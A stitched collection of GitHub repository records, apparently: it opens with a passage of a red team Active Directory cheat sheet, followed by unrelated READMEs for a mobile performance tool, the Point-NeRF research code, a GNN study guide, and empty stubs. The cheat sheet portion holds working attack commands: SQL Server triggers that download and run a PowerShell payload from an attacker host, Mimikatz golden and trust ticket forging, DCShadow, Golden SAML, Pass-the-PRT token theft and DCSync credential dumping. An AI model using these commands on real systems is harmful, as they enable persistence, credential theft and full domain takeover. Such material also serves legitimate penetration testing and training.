System.Net.WebClient).DownloadString('http://$ip_attacker/payload.ps1')"' GO ``` *use DDL triggers for persistence* ```sql CREATE Trigger [persistence_ddl_1] ON ALL Server FOR DDL_LOGIN_EVENTS AS EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString('http://$ip_attacker/payload.ps1')" GO ``` *use Logon triggers for persistence* ```sql CREATE Trigger [persistence_logon_1] ON ALL SERVER WITH EXECUTE AS 'sa' FOR LOGON AS BEGIN IF ORIGINAL_LOGIN() = 'testuser' EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString('http://$ip_attacker/payload.ps1')" END; ``` ## Forest Persistence ### DCShadow **DCShadow temporarily registers a new domain controller in the target domain** and uses it to "push" attributes like SIDHistory, SPNs... on specified objects without leaving the change logs for modified object! *โš ๏ธ Requirements :* - DA privileges are required to use DCShadow. - The attacker's machine must be part of the root domain. The attack needs 2 instances on a compromised machine : **1 instance :** *start RPC servers with SYSTEM privileges and specify attributes to be modified* ```c mimikatz # !+ mimikatz # !processtoken mimikatz # lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow" ``` **2 instance :** *with enough privileges of DA to push the values :* ```c mimikatz # sekurlsa::pth /user:Administrator /domain:$domain /ntlm:$admin_hash /impersonate mimikatz # lsadump::dcshadow /push ``` ## Cross Forest Attacks ### Trust Tickets *Dumping Trust Key* ```powershell Invoke-Mimikatz -Command '"lsadump::trust /patch"' ``` *Forging IR-TGT using Trust key* ```powershell Invoke-Mimikatz -Command '"Kerberos::golden /domain:$domain /sid:$sid /sids:$extra_sids /rc4:$rc4_hash /user:Administrator /service:krbtgt /target:$target /ticket:$path/to/trust_ticket.kirbi"' ``` *get TGS for CIFS service* ```powershell asktgs path/to/trust_ticket.kirbi CIFS/ps-dc.powershell.local ``` *use TGS for CIFS service* ```powershell kirbikator.exe lsa .\CIFS.$domain.kirbi ls \\$domain\`c$ ``` ### Using KRBTGT hash ```powershell Invoke-Mimikatz -Command '"lsadump::lsa /patch"' Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domaine.fun.local /sid:S-1-5-x-x-x-x /sids:S-1-5-x-x-x-x-519 /krbtgt:<hash> /ticket:C:\path\krb_tgt.kirbi"' Invoke-Mimikatz -Command '"kerberos::ptt C:\path\krb_tgt.kirbi ``` ## Azure Active Directory ### AZ User Enumeration *connection to Azure Active Directory with **Connect-MsolService**.* ```powershell PS> Connect-MsolService -Credential $cred ``` *this command allow enumeration with MFA (MultiFactor Authentification)* ```powershell Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if( $_.StrongAuthenticationRequirements.State -ne $null){ $_. StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv ``` *locate Azure AD Connect Server* ```powershell ldapsearch -H ldap://DC01.MEGACORP.CORP:389 -D "MEGACORP\john" -w $password -b "DC=MEGACORP,DC=CORP" '(description=*Azure*)' description ``` ### Enumeration using AZ CLI **Storage Enumeration** *blob storage enumeration* ```powershell az storage account list -o table az storage account list -o json | jq -r '.[].name' ``` ### PowerZure *create a new user* ```powershell New-AzureUser -Username 'john.doe@megacorp.com' -Password catAker ``` *Executes a command on a specified VM* ```powershell Execute-Command -OS Windows -VM Win10 -ResourceGroup rg01 -Command "whoami" ``` ### Golden SAML *โš ๏ธ Requirements :* - Admin privileges of ADFS server - `ADFS Public Certificate` - `IdP Name` - `Role Name` > Obtain `ADFS Public Certificate`: ```powershell PS > [System.Convert]::ToBase64String($cer.rawdata) ``` > Obtain `IdP Name`: ```powershell PS > (Get-ADFSProperties).Identifier.AbsoluteUri ``` > Obtain `Role Name`: ```powershell PS > (Get-ADFSRelyingPartyTrust).IssuanceTransformRule ``` a toolkit to exploit Golden SAML can be found [here](https://github.com/secureworks/whiskeysamlandfriends) > ** Golden SAML is similar to golden ticket and affects the Kerberos protocol. Like the Golden Ticket, the Golden SAML allows an attacker to access resources protected by SAML agents (examples: Azure, AWS, vSphere, Okta, Salesforce, ...) with elevated privileges through a golden ticket.** *ShockNAwe:* - 1. Remotely extracts the AD FS configuration settings - 2. Forges and signs a Golden SAML token - 3. Extracts the โ€˜assertionโ€™ portion of the Golden SAML token and passes it to the Azure Core Management API to obtain a valid access token for the API - 4. Enumerates the Subscription ID - 5. Enumerates the complete list of VMs in the subscription - 6. Executes arbitrary commands on all VMs as SYSTEM/root *WhiskeySAML:* - 1. Remotely extract AD FS configuration settings - 2. Forge and sign Golden SAML tokens - 3. Pass the Golden SAML token to the Microsoft Azure portal - 4. Log into the Azure portal as any user while bypassing Azure MFA configurations ```bash python3 shocknawe.py --target-user $user --domain $domain --adfs-host=$adfs_server --dc-ip $ip ``` ### PRT Manipulation #### PassThePRT *check AzureAdJoined Status and download Mimikatz:* ```powershell dsregcmd.exe /status iex (New-Object Net.Webclient).downloadstring(โ€œhttps://server/Invoke-Mimikatz.ps1โ€) ``` *Looking for **prt** and **KeyValue**:* ```c mimikatz # privilege::debug mimikatz # sekurlsa::cloudap ``` *use **APKD function** to decode **KeyValue** and save **"Context"** and **"DerivedKey"** value:* ```c mimikatz # token::elevate mimikatz # dpapi::cloudapkd /keyvalue:$KeyValue /unprotect ``` ```c mimikatz # dpapi::cloudapkd /context:$context /derivedkey:$DerivedKey /Prt:$prt ---SNIP--- Signed JWT : eyJ... ``` *Forge PRT-Cookie using [lantern](https://github.com/ConstantinT/Lantern):* ```powershell Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz> Lantern.exe cookie --sessionkey <SessionKey> --prt <PRT from Mimikatz> ``` *Generate JWT* ```powershell PS AADInternals> $PRT_OF_USER = '...' PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="} PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER)) PS AADInternals> $ClearKey = "XXYYZZ..." PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne '')) PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey โ€“GetNonce ``` ### MSOL Service Account > you can dump MSOL Service account with [azuread_decrypt_msol.ps1](https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c) used by Azure AD Connect Sync and launch a DCsync attack with the dumped creds *DCSync with MSOL account* ```powershell secretsdump -outputfile hashes $domain/$msol_svc_acc:$msol_pwd@$ip ``` ## Miscs ### Domain Level Attribute #### MachineAccountQuota (MAQ) Exploitation use crackmapexec (CME) with maq module : `cme ldap $dc -d $DOMAIN -u $USER -p $PASSWORD -M maq` #### BadPwdCount ```python crackmapexec ldap 10.10.13.100 -u $user -p $pwd --kdcHost 10.10.13.100 --users LDAP 10.10.13.100 389 dc1 Guest badpwdcount: 0 pwdLastSet: <never> ``` ### Abusing IPv6 in AD sending ICMPv6 packet to the target using ping6 : `ping6 -c 3 <target>` scanning IPv6 address using nmap : `nmap -6 -sCV dead:beef:0000:0000:b885:d62a:d679:573f --max-retries=2 --min-rate=3000 -Pn -T3` tips for adapting tools for ipv6 : ```bash echo -n "port1" "port2" "port3" | xargs -d ' ' -I% bash -c 'socat TCP4-LISTEN:%,fork TCP6:[{ipv6-address-here}]:% &' netstat -laputen |grep LISTEN ``` you can replace AF_INET value to AF_INET6 from socket python lib : ```bash sed -i "s/AF_INET/AF_INET6/g" script.py ``` #### Rogue DHCP `mitm6 -i eth0 -d 'domain.job.local'` #### IOXIDResolver Interface Enumeration it's a little script that enumerate addresses in NetworkAddr field with [**RPC_C_AUTHN_DCE_PUBLIC**](https://docs.microsoft.com/en-us/windows/win32/rpc/authentication-service-constants) level ```py from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5.dcomrt import IObjectExporter RPC_C_AUTHN_DCE_PUBLIC = 2 stringBinding = r'ncacn_ip_tcp:%s' % "IP" rpctransport = transport.DCERPCTransportFactory(stringBinding) rpc = rpctransport.get_dce_rpc() rpc.set_auth_level(RPC_C_AUTHN_DCE_PUBLIC) rpc.connect() print("[*] Try with RPC_C_AUTHN_DCE_PUBLIC...") exporter = IObjectExporter(rpc) binding = exporter.ServerAlive2() for bind in binding: adr = bind['aNetworkAddr'] print("Adresse:", adr) ``` ## References - https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/cloudap - https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ - https://www.thehacker.recipes/ad/movement/kerberos/asreproast - https://www.hackingarticles.in/credential-dumping-ntds-dit/ - https://blog.alsid.eu/dcshadow-explained-4510f52fc19d - https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet - https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys - https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94 - https://github.com/rootsecdev/Azure-Red-Team - https://www.secureworks.com/blog/going-for-the-gold-penetration-testing-tools-exploit-golden-saml
Red Team Cheatsheet in constant expansion.
active-directory,pentesting,enumeration,redteam,powershell,real-life,oscp,osep,attack,attacking-active-directory
0
6
12
298
0
2
0
saimoomedits/dotfiles
null
The ArchLinux and AwesomeWM configs. ๐Ÿ“‚
archlinux,dotfiles,arch-linux,awesomewm,ricing,rice,linux,setup,configuration,desktop
0
5
10
82
11
2
0
bamlab/flashlight
<p align="center"> <img src="./website/static/img/logo-black.svg" alt="Flashlight" width="50%" ><br /> </p> # Get a performance score for your app ๐Ÿ”ฆ Flashlight generates a performance score for your Android app, aggregating different metrics. _(๐Ÿ“ฑ iOS support is also [in the works](https://github.com/bamlab/flashlight/issues))_ ๐Ÿ™… No setup required in your app ๐Ÿš€ Measure performance even on **production** apps โœจ Generates beautiful reports ([like this Flatlist/Flashlist comparison](https://docs.flashlight.dev/examples/flashlist/report.html)) <img width="596" alt="image" src="https://github.com/bamlab/flashlight/assets/4534323/82e107f4-8682-4c77-ab18-985fa1b8c2d1" style="border-radius: 10px"> <br /> <br /> With Flashlight ๐Ÿ”ฆ, you can either: - Upload an app and get your performance score on [app.flashlight.dev](https://app.flashlight.dev/) Or use the CLI: - [`flashlight measure`](https://docs.flashlight.dev): quickly audit your perf with real-time measures - [`flashlight test`](https://docs.flashlight.dev/test): automate your measures with e2e performance testing over several iterations - [`flashlight cloud`](https://docs.flashlight.dev/cloud): run measures on real devices in the cloud & integrate in your CI setup ## Installation **macOS/Linux** ```bash curl https://get.flashlight.dev | bash ``` **Windows** ```powershell iwr https://get.flashlight.dev/windows -useb | iex ``` ## Usage Head over to the docs at [docs.flashlight.dev](https://docs.flashlight.dev) ## Contributing We love pull requests! Head over to [the contribution guide](./CONTRIBUTING.md) to get started.
๐Ÿ“ฑโšก๏ธ Lighthouse for Mobile - audits your app and gives a performance score to your Android apps (native, React Native, Flutter..). Measure performance on CLI, E2E tests, CI...
android,performance,react-native,flutter,lighthouse,native,e2e,mobile,apm,monitoring
83
81
236
451
11
40
8
Xharlie/pointnerf
# Point-NeRF: Point-based Neural Radiance Fields (CVPR 2022 Oral ๐Ÿคฉ) <img src="./images/Adobe-Logos.png" width=120px /><img src="images/USC-Logos.png" width=120px /> [Project Sites](https://xharlie.github.io/projects/project_sites/pointnerf/index.html) | [Paper](https://arxiv.org/pdf/2201.08845.pdf) | Primary contact: [Qiangeng Xu](https://xharlie.github.io/) Point-NeRF uses neural 3D point clouds, with associated neural features, to model a radiance field. Point-NeRF can be rendered efficiently by aggregating neural point features near scene surfaces, in a ray marching-based rendering pipeline. Moreover, Point-NeRF can be initialized via direct inference of a pre-trained deep network to produce a neural point cloud; this point cloud can be finetuned to surpass the visual quality of NeRF with 30X faster training time. Point-NeRF can be combined with other 3D reconstruction methods and handles the errors and outliers in such methods via a novel pruning and growing mechanism. <!-- <img src="./images/pipeline.png" /> --> [![CVPR 2022 Oral Presentation](https://github.com/Xharlie/pointnerf/blob/master/images/youtube.png)](https://youtu.be/zmR9j-4AebA) ## Reference Please cite our paper if you are interested <strong>Point-NeRF: Point-based Neural Radiance Fields</strong>. &nbsp;&nbsp;&nbsp; ``` @inproceedings{xu2022point, title={Point-nerf: Point-based neural radiance fields}, author={Xu, Qiangeng and Xu, Zexiang and Philip, Julien and Bi, Sai and Shu, Zhixin and Sunkavalli, Kalyan and Neumann, Ulrich}, booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition}, pages={5438--5448}, year={2022} } ``` ## Updates ## 1. To replace pycuda, we have implemented the pytorch cuda functions when using world coordinates to group neural points. Simply set wcoord_query=-1 in your configuration file if the original setting is wcoord_query=1 (see dev_scripts/w_n360/chair_cuda.sh). 2. We have received constructive feedbacks that when Point-NeRF use MVSNet to reconstruct point cloud, the point fusion after depth estimation by MVSNet will use the alpha channel information in the NeRF-Synthetic Dataset. It is due to the fact that MVSNet cannot handle background very well. To improve the fairness, we include new training scripts and results of PointNeRF + MVSNet when using background color for filtering. The results (see below) are similar to the ones that are previously reported. | | Chair | Drums | Lego | Mic | Materials | Ship | Hotdog | Ficus | Avg | | ---- | ---- | ---- | --- | ---- | ---- | ---- | ------- | ------- |------- | | PSNR | 35.60 | 26.04 | 35.27 | 35.91 | 29.65 | 30.61 | 37.34 | 35.61 | 33.25 | | SSIM | 0.991 | 0.954 | 0.989 | 0.994 | 0.971 | 0.938 | 0.991 | 0.992 | 0.978 | | LPIPSVgg | 0.023 | 0.078 | 0.021 | 0.014 | 0.071 | 0.129 | 0.036 | 0.025 | 0.050 | | LPIPSAlex | 0.010 | 0.055 | 0.010 | 0.007 | 0.041 | 0.076 | 0.016 | 0.011 | 0.028 | This issue only affacts situations when Point-NeRF uses MVSNet on NeRF-Synthetic Dataset. The Colmap results and results on other datasets are not impacted. An even more reasonable reconstruction approach should exclude using the knowledge of background color or other point filtering. Therefore, we suggest users to combine PointNeRF with more powerful MVS models, such as [TransMVS](https://github.com/megvii-research/TransMVSNet). ## Overal Instruction 1. Please first install the libraries as below and download/prepare the datasets as instructed. 2. Point Initialization: Download pre-trained MVSNet as below and train the feature extraction from scratch or directly download the pre-trained models. (Obtain 'MVSNet' and 'init' folder in checkpoints folder) 3. Per-scene Optimization: Download pre-trained models or optimize from scratch as instructed. For nerfsynthetic, colmap_nerfsynthetic, tanks&temples, scannet and dtu, We provide all the checkpoint_files [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing) | [baidu wangpan](https://pan.baidu.com/s/1doJHI03Tgl_qIquGZuW5bw?pwd=p8bs); all the images and scores of the test results [google drive](https://drive.google.com/drive/folders/1KAYs7XuBJNMTHVBuOCtpLNv9P8UMoayw?usp=sharing) | [baidu wangpan](https://pan.baidu.com/s/1BMewWRSIkNFlp7DKYmx9vQ?pwd=3yse); and video results [google drive](https://drive.google.com/drive/folders/1dutZEZO9vfeIbfWwplbIIam7YBeyZ0dY?usp=sharing) | [baidu wangpan](https://pan.baidu.com/s/1kC1qSL5dkT8cDdE3dHTc2A?pwd=j46j); We also share the visual results of [npbg](https://github.com/alievk/npbg), [nsvf](https://github.com/facebookresearch/NSVF) and [ibrnet](https://github.com/googleinterns/IBRNet) on the Nerf Synthetic dataset generated by our machine [google drive](https://drive.google.com/drive/folders/1KHhljnqLvIJkRkaqQ8TaeBZirMsnDAhf?usp=sharing); Please cite their papers accordingly if interested. ## Installation ### Requirements All the codes are tested in the following environment: * Linux (tested on Ubuntu 16.04, 18.04, 20.04) * Python 3.6+ * PyTorch 1.7 or higher (tested on PyTorch 1.7, 1.8.1, 1.9, 1.10) * CUDA 10.2 or higher ### Install Install the dependent libraries as follows: * Install the dependent python libraries: ``` pip install torch==1.8.1+cu102 h5py pip install imageio scikit-image ``` * Install pycuda (crucial) following: https://documen.tician.de/pycuda/install.html * Install torch_scatter following: https://github.com/rusty1s/pytorch_scatter We develope our code with pytorch1.8.1, pycuda2021.1, and torch_scatter 2.0.8 ## Data Preparation The layout should looks like this, we provide all data folder here: [google_drive](https://drive.google.com/drive/folders/1-Fn5g-NgHC0RcyWapHdfsqbSQksTgB4N?usp=sharing), except for scannet (We take it down on Mar 8th 2023, to respect Scannet's policy, please go to Scannet's official website for data.) ``` pointnerf โ”œโ”€โ”€ data_src โ”‚ โ”œโ”€โ”€ dtu โ”‚ โ”‚ โ”‚โ”€โ”€Cameras โ”‚ โ”‚ โ”‚โ”€โ”€Depths โ”‚ โ”‚ โ”‚โ”€โ”€Depths_raw โ”‚ โ”‚ โ”‚โ”€โ”€Rectified โ”œโ”€โ”€ nerf โ”‚ โ”‚ โ”‚โ”€โ”€nerf_synthetic โ”‚ โ”‚ โ”‚โ”€โ”€nerf_synthetic_colmap โ”œโ”€โ”€ TanksAndTemple โ”œโ”€โ”€ scannet โ”‚ โ”‚ โ”‚โ”€โ”€scans | โ”‚ โ”‚ โ”‚โ”€โ”€scene0101_04 | โ”‚ โ”‚ โ”‚โ”€โ”€scene0241_01 ``` Or you can download using the official links as follows: ## DTU: Download the preprocessed [DTU training data](https://drive.google.com/file/d/1eDjh-_bxKKnEuz5h-HXS7EDJn59clx6V/view) and [Depth_raw](https://virutalbuy-public.oss-cn-hangzhou.aliyuncs.com/share/cascade-stereo/CasMVSNet/dtu_data/dtu_train_hr/Depths_raw.zip) from original [MVSNet repo](https://github.com/YoYo000/MVSNet) and unzip. ## NeRF Synthetic Download `nerf_synthetic.zip` from [here](https://drive.google.com/drive/folders/128yBriW1IG_3NJ5Rp7APSTZsJqdJdfc1) under ``data_src/nerf/'' ## Tanks & Temples Follow Neural Sparse Voxel Fields and download [Tanks&Temples](https://www.tanksandtemples.org/) | [download (.zip)](https://dl.fbaipublicfiles.com/nsvf/dataset/TanksAndTemple.zip) | 0_\* (training) 1_\* (testing) as: ``data_src/TanksAndTemple/'' ## ScanNet Download and extract ScanNet by following the instructions provided at http://www.scan-net.org/. The detailed steps including: * Go to http://www.scan-net.org and fill & sent the request form. * You will get a email that has command instruction and a download-scannet.py file, this file is for python 2, you can use our download-scannet.py in the ``data'' directory for python 3. * clone the official repo: ``` git clone https://github.com/ScanNet/ScanNet.git ``` * Download specific scenes (used by NSVF): ``` python data/download-scannet.py -o ../data_src/scannet/ id scene0101_04 python data/download-scannet.py -o ../data_src/scannet/ id scene0241_01 ``` * Process the sens files: ``` python ScanNet/SensReader/python/reader.py --filename data_src/nrData/scannet/scans/scene0101_04/scene0101_04.sens --output_path data_src/nrData/scannet/scans/scene0101_04/exported/ --export_depth_images --export_color_images --export_poses --export_intrinsics python ScanNet/SensReader/python/reader.py --filename data_src/nrData/scannet/scans/scene0241_01/scene0241_01.sens --output_path data_src/nrData/scannet/scans/scene0241_01/exported/ --export_depth_images --export_color_images --export_poses --export_intrinsics ``` ## Point Initialization / Generalization: ### &nbsp; Download pre-trained MVSNet checkpoints: We trained [MVSNet](https://github.com/xy-guo/MVSNet_pytorch) on DTU. You can Download ''MVSNet'' directory from [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing) and place them under '''checkpoints/''' ### &nbsp; Train 2D feature extraction and point representation ##### &nbsp; Directly use our trained checkpoints files: Download ''init'' directory from [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing). and place them under '''checkpoints/''' ##### &nbsp; Or train from scratch: Train for point features of 63 channels (as in paper) ``` bash dev_scripts/ete/dtu_dgt_d012_img0123_conf_color_dir_agg2.sh ``` Train for point features of 32 channels (better for per-scene optimization) ``` bash dev_scripts/ete/dtu_dgt_d012_img0123_conf_agg2_32_dirclr20.sh ``` After the training, you should pick a checkpoint and rename it to best checkpoint, e.g.: ``` cp checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/250000_net_ray_marching.pth checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/best_net_ray_marching.pth cp checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/250000_net_mvs.pth checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/best_net_mvs.pth ``` ### &nbsp; Test feed forward inference on dtu scenes These scenes that are selected by MVSNeRF, please also refer their code to understand the metrics calculation. ``` bash dev_scripts/dtu_test_inf/inftest_scan1.sh bash dev_scripts/dtu_test_inf/inftest_scan8.sh bash dev_scripts/dtu_test_inf/inftest_scan21.sh bash dev_scripts/dtu_test_inf/inftest_scan103.sh bash dev_scripts/dtu_test_inf/inftest_scan114.sh ``` ## Per-scene Optimization: <img src="https://github.com/Xharlie/xharlie.github.io/raw/master/projects/project_sites/pointnerf/vid/ficus.gif" width="45%" /><img src="https://github.com/Xharlie/xharlie.github.io/raw/master/projects/project_sites/pointnerf/vid/scene101.gif" width="50%" /> <img src="https://github.com/Xharlie/xharlie.github.io/raw/master/projects/project_sites/pointnerf/vid/truck.gif" width="70%" /> (Please visit the project sites to see the original videos of above scenes, which have quality loss when being converted to gif files here.) ### Download per-scene optimized Point-NeRFs You can skip training and download the folders of ''nerfsynth'', ''tanksntemples'' and ''scannet'' here [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing), and place them in ''checkpoints/''. ``` pointnerf โ”œโ”€โ”€ checkpoints โ”‚ โ”œโ”€โ”€ init โ”œโ”€โ”€ MVSNet โ”œโ”€โ”€ nerfsynth โ”œโ”€โ”€ col_nerfsynth โ”œโ”€โ”€ scannet โ”œโ”€โ”€ tanksntemples ``` In each scene, we provide initialized point features and network weights ''0_net_ray_marching.pth'', points and weights at 20K steps ''20000_net_ray_marching.pth'' and 200K steps ''200000_net_ray_marching.pth'' ### Test the per-scene optimized Point-NeRFs #### NeRF Synthetics <details> <summary>test scripts</summary> ``` bash dev_scripts/w_n360/chair_test.sh bash dev_scripts/w_n360/drums_test.sh bash dev_scripts/w_n360/ficus_test.sh bash dev_scripts/w_n360/hotdog_test.sh bash dev_scripts/w_n360/lego_test.sh bash dev_scripts/w_n360/materials_test.sh bash dev_scripts/w_n360/mic_test.sh bash dev_scripts/w_n360/ship_test.sh ``` </details> #### ScanNet <details> <summary>test scripts</summary> ``` bash dev_scripts/w_scannet_etf/scane101_test.sh bash dev_scripts/w_scannet_etf/scane241_test.sh ``` </details> #### Tanks & Temples <details> <summary>test scripts</summary> ``` bash dev_scripts/w_tt_ft/barn_test.sh bash dev_scripts/w_tt_ft/caterpillar_test.sh bash dev_scripts/w_tt_ft/family_test.sh bash dev_scripts/w_tt_ft/ignatius_test.sh bash dev_scripts/w_tt_ft/truck_test.sh ``` </details> ### Per-scene optimize from scatch Make sure the ''checkpoints'' folder has ''init'' and ''MVSNet''. The training scripts will start to do initialization if there is no ''.pth'' files in a scene folder. It will start from the last ''.pth'' files until reach the iteration of ''maximum_step''. #### NeRF Synthetics using MVSNet (w/ alpha channel filtering during point cloud reconstruction and pycuda) <details> <summary>train scripts</summary> ``` bash dev_scripts/w_n360/chair.sh bash dev_scripts/w_n360/drums.sh bash dev_scripts/w_n360/ficus.sh bash dev_scripts/w_n360/hotdog.sh bash dev_scripts/w_n360/lego.sh bash dev_scripts/w_n360/materials.sh bash dev_scripts/w_n360/mic.sh bash dev_scripts/w_n360/ship.sh ``` </details> #### NeRF Synthetics using MVSNet (w/ background color filtering during point cloud reconstruction and pytorch cuda) <details> <summary>train scripts</summary> ``` bash dev_scripts/w_n360/chair_cuda.sh bash dev_scripts/w_n360/drums_cuda.sh bash dev_scripts/w_n360/ficus_cuda.sh bash dev_scripts/w_n360/hotdog_cuda.sh bash dev_scripts/w_n360/lego_cuda.sh bash dev_scripts/w_n360/materials_cuda.sh bash dev_scripts/w_n360/mic_cuda.sh bash dev_scripts/w_n360/ship_cuda.sh ``` </details> #### NeRF Synthetics using COLMAP points Please download the COLMAP data (see above). If there is {maximum_step}.pth checkpoint files in the path, the scripts below will also run test. <details> <summary>train scripts</summary> ``` bash dev_scripts/w_colmap_n360/col_chair.sh bash dev_scripts/w_colmap_n360/col_drums.sh bash dev_scripts/w_colmap_n360/col_ficus.sh bash dev_scripts/w_colmap_n360/col_hotdog.sh bash dev_scripts/w_colmap_n360/col_lego.sh bash dev_scripts/w_colmap_n360/col_materials.sh bash dev_scripts/w_colmap_n360/col_mic.sh bash dev_scripts/w_colmap_n360/col_ship.sh ``` </details> #### ScanNet <details> <summary>train scripts</summary> ``` bash dev_scripts/w_scannet_etf/scene101.sh bash dev_scripts/w_scannet_etf/scene241.sh ``` </details> #### Tanks & Temples <details> <summary>train scripts</summary> ``` bash dev_scripts/w_tt_ft/barn.sh bash dev_scripts/w_tt_ft/caterpillar.sh bash dev_scripts/w_tt_ft/family.sh bash dev_scripts/w_tt_ft/ignatius.sh bash dev_scripts/w_tt_ft/truck.sh ``` </details> ## Acknowledgement Our repo is developed based on [MVSNet](https://github.com/YoYo000/MVSNet), [NeRF](https://github.com/bmild/nerf), [MVSNeRF](https://github.com/apchenstu/mvsnerf), and [NSVF](https://github.com/facebookresearch/NSVF). Please also consider citing the corresponding papers. The project is conducted collaboratively between Adobe Research and University of Southern California. ## LICENSE The repo is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 2.0, and is restricted to academic use only. See [LICENSE](https://github.com/Xharlie/pointnerf/blob/master/LICENSE.md).
Point-NeRF: Point-based Neural Radiance Fields
nerf,point-cloud,point-based-graphics,volume-rendering,differentiable-rendering,neural-rendering,neural-renderer,mvs,multiview-stereo,reconstruction
0
3
3
44
68
1
0
xiaorouji/openwrt-passwall2
null
null
null
43
31
66
392
11
1
2
dair-ai/GNNs-Recipe
# Graph Neural Networks (GNNs) Study Guide ![](/gnn.jpeg) Graph neural networks (GNNs) are rapidly advancing progress in ML for complex graph data applications. I've composed this concise recipe (i.e., studysheet) dedicated to students who are lookin to learn and keep up-to-date with GNNs. It's non-exhaustive but it aims to get students familiar with the topic. ## โญ Gentle Introduction to GNNs There are several introductory content to learn about GNNs. The following are some useful ones: ๐Ÿ”— [Foundations of GNNs](https://www.youtube.com/watch?v=uF53xsT7mjc) (by Petar Veliฤkoviฤ‡) ๐Ÿ”— [Gentle Introduction to GNNs](https://distill.pub/2021/gnn-intro/) (by Distill) ๐Ÿ”— [Understanding Convolutions on Graphs](https://distill.pub/2021/understanding-gnns/) (by Distill) ๐Ÿ”— [Math Behind Graph Neural Networks](https://rish-16.github.io/posts/gnn-math/) (by Rishabh Anand) ๐Ÿ”— [Graph Convolutional Networks](http://tkipf.github.io/graph-convolutional-networks/) (by Thomas Kipf) ๐Ÿ”—[Graph Neural Networks for Geometric Graphs - Chaitanya K. Joshi, Simon V. Mathis](https://youtu.be/VKj5wzZsoK4) ## ๐Ÿ“˜ Survey Papers on GNNs Here are two fantastic survey papers on the topic to get a broader and concise picture of GNNs and recent progress: ๐Ÿ”— [Graph Neural Networks: A Review of Methods and Applications](https://arxiv.org/abs/1812.08434) (Jie Zhou, Ganqu Cui, Shengding Hu, Zhengyan Zhang, Cheng Yang, Zhiyuan Liu, Lifeng Wang, Changcheng Li, Maosong Sun) ๐Ÿ”— [Graph Neural Networks: Methods, Applications, and Opportunities](https://arxiv.org/abs/2108.10733) (Lilapati Waikhom, Ripon Patgiri) ๐Ÿ”— [A Comprehensive Survey on Graph Neural Networks](https://arxiv.org/abs/1901.00596) (Zonghan Wu, Shirui Pan, Fengwen Chen, Guodong Long, Chengqi Zhang, Philip S. Yu) ## ๐Ÿ‘ฉโ€๐Ÿ’ป Diving Deep into GNNs After going through quick high-level introductory content, here are some great material to go deep: ๐Ÿ”— [Geometric Deep Learning](https://geometricdeeplearning.com/) (by Michael M. Bronstein, Joan Bruna, Taco Cohen, Petar Veliฤkoviฤ‡) ๐Ÿ”— [Graph Representation Learning Book](https://www.cs.mcgill.ca/~wlh/grl_book/) (by William Hamilton) ๐Ÿ”— [CS224W: ML with Graphs](https://www.youtube.com/playlist?list=PLoROMvodv4rPLKxIpqhjhPgdQy7imNkDn) (by Jure Leskovec) ## ๐Ÿ“š GNN Papers and Implementations If you want to keep up-to-date with popular recent methods and paper implementations for GNNs, the Papers with Code community maintains this useful collection: ๐Ÿ™ [Graph Models by Papers with Code](https://paperswithcode.com/methods/category/graph-models) ## ๐Ÿ“ˆ Benchmarks and Datasets If you are interested in benchmarks/leaderboards and graph datasets that evaluate GNNs, the Papers with Code community also maintains such content here: ๐Ÿ”— [Datasets by Papers with Code](https://paperswithcode.com/datasets?mod=graphs&page=1) ๐Ÿ”— [Graph Benchmarks by Papers with Code](https://paperswithcode.com/area/graphs) ## :octocat: Tools Here are a few useful tools to get started with GNNs: ๐Ÿ”ฅ [PyTorch Geometric](https://pytorch-geometric.readthedocs.io/en/latest/#) ๐Ÿ”— [Deep Graph Library](https://www.dgl.ai/) ๐Ÿฆ’ [jraph](https://github.com/deepmind/jraph) ๐ŸŸ  [Spektral](https://graphneural.network/) ## ๐ŸŽ Tutorials I will be posting several tutorials on GNNs, here is the first of the series. More coming soon! <table> <tr> <td>Introduction to GNNs with PyTorch Geometric</td> <td><a href="https://colab.research.google.com/drive/1d0jLDwgNBtjBVQOFe8lO_1WrqTVeVZx9?usp=sharing"> <img src="https://colab.research.google.com/assets/colab-badge.svg" width = '' > </a></td> </tr> </table> --- To get regular updates on new ML and NLP resources, follow me on [Twitter](https://twitter.com/omarsar0).
๐ŸŸ  A study guide to learn about Graph Neural Networks (GNNs)
graph-neural-networks,deep-learning,machine-learning,graph,graph-convolutional-networks
0
3
3
15
0
2
0
scambier/obsidian-omnisearch
